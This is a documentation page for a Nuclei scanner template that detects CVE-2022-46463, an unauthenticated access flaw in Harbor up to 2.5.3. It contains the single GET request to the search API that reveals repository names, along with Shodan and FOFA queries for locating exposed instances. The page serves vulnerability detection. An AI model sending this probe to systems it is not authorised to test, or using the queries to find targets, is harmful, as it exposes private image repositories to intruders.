Skip to content
Nuclei Templates

Harbor <=2.5.3 - Unauthorized Access

ID: CVE-2022-46463

Severity: high

Author: Arm!tage

Tags: cve,cve2022,harbor,auth-bypass,exposure,linuxfoundation

Description

Section titled “Description”

An access control issue in Harbor v1.X.X to v2.5.3 allows attackers to access public and private image repositories without authentication

YAML Source

Section titled “YAML Source”
id: CVE-2022-46463


info:
  name: Harbor <=2.5.3 - Unauthorized Access
  author: Arm!tage
  severity: high
  description: |
    An access control issue in Harbor v1.X.X to v2.5.3 allows attackers to access public and private image repositories without authentication
  impact: |
    Successful exploitation of this vulnerability can lead to unauthorized access to sensitive data stored in Harbor.
  remediation: |
    Upgrade Harbor to a version higher than 2.5.3 to mitigate the vulnerability.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2022-46463
    - https://github.com/Vad1mo
    - https://github.com/lanqingaa/123/blob/main/README.md
    - https://github.com/lanqingaa/123/tree/bb48caa844d88b0e41e69157f2a2734311abf02d
    - https://github.com/lanqingaa/123
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2022-46463
    cwe-id: CWE-306
    epss-score: 0.01473
    epss-percentile: 0.86471
    cpe: cpe:2.3:a:linuxfoundation:harbor:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: linuxfoundation
    product: harbor
    shodan-query: http.favicon.hash:657337228
    fofa-query: icon_hash=657337228
  tags: cve,cve2022,harbor,auth-bypass,exposure,linuxfoundation


http:
  - method: GET
    path:
      - "{{BaseURL}}/api/v2.0/search?q=/"


    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "repository_name"
          - "project_name"
        condition: and


      - type: status
        status:
          - 200
# digest: 4a0a004730450220449603ddc491f4e76cd65515179856b40d8912aba200bf0340f290fec65bb797022100cac2947b49a158ecc9d280ab30085caf0d60125a2379506ab5fde6a50e0da316:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2022/CVE-2022-46463.yaml"

View on Github